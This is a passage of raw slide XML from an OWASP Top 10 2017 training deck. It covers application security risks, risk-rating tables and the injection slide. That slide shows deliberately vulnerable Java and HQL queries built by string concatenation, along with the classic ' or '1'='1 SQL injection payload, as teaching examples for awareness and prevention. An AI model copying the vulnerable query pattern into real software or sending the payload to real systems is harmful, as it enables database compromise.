                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A4]</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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting (XSS)</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A8 – Cross-Site Request Forgery (CSRF)</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600" b="0" baseline="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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9 – Using Components with Known Vulnerabilities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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Using Components with Known Vulnerabilities</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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10 – Unvalidated Redirects and Forwards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600" b="0" baseline="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950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW,Comm.]</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RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Are Application Security Risks?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gn="l" rtl="0">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ru-RU" sz="95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ru-RU" sz="95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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">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sz="4000"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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633617837"/>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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" u="sng">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risk?</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ru-RU" sz="950">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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ru-RU"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ru-RU" sz="950" b="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ru-RU"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ru-RU"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ru-RU" sz="950" b="0" u="none"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p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU"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ru-RU"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32219579"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="76199" y="6102170"/>
          <a:ext cx="4388400" cy="102108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152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU"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Specific</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ru-RU"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Easy: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Widespread: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="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Easy: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Severe: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Average: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Common</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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9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Average: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Moderate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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9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ru-RU"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Difficult: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Uncommon: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Difficult: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>Minor: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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ru-RU"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ru-RU" sz="1200" b="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p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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Article on Threat/Risk Modeling</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="l" rtl="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ru-RU" sz="1200" b="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ru-RU"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ISO 31000: Risk Management Std</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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27001: ISMS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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NIST Cyber Framework (US)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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ASD Strategic Mitigations (AU)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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NIST CVSS 3.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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Microsoft Threat Modelling Tool</a:t>
                      </a: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T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Risks – 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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A2:2017-Broken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677749"/>
            <a:ext cx="5218177" cy="66610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may be compromised without extra protection, such as encryption at rest or in transit, and requires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A5:2017-Broken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54225"/>
            <a:ext cx="5218177" cy="68226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be patched and upgraded in a timely fashion.</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877145"/>
            <a:ext cx="5218177" cy="66158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HTML or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A7:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">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A9:2017-Using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A10:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Insufficient </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">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ru-RU" sz="1200" b="1">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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  custID=</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 + request.getParameter("id") +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900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Query HQLQuery = session.createQuery("FROM accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WHERE custID=</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 + request.getParameter("id") +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90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/accountView?id=</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 or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1</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ru-RU" sz="90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sz="90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Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some of the more common injections are SQL, NoSQL, OS command, Object Relational Mapping (ORM), LDAP, and Expression Language (EL) or Object Graph Navigation Library (OGNL) injection. The concept is identical among all interpreters. Source code review is the best method of detecting if applications are vulnerable to injections, closely followed by thorough automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs. Organizations can include static source (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) and dynamic application test (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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6"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Parameterize Queries</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7"/>
              </a:rPr>
              <a:t>OWASP ASVS: V5 Input Validation and Encoding</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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ORM injection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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention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2"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: SQL Injection Prevention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3"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention in Java</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4"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Query Parameterization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5"/>
              </a:rPr>
              <a:t>OWASP Automated Threats to Web Applications – OAT-014</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6"/>
              </a:rPr>
              <a:t>CWE-77: Command Injection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7"/>
              </a:rPr>
              <a:t>CWE-89: SQL Injection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8"/>
              </a:rPr>
              <a:t>CWE-564: Hibernate Injection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9"/>
              </a:rPr>
              <a:t>CWE-917: Expression Language Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
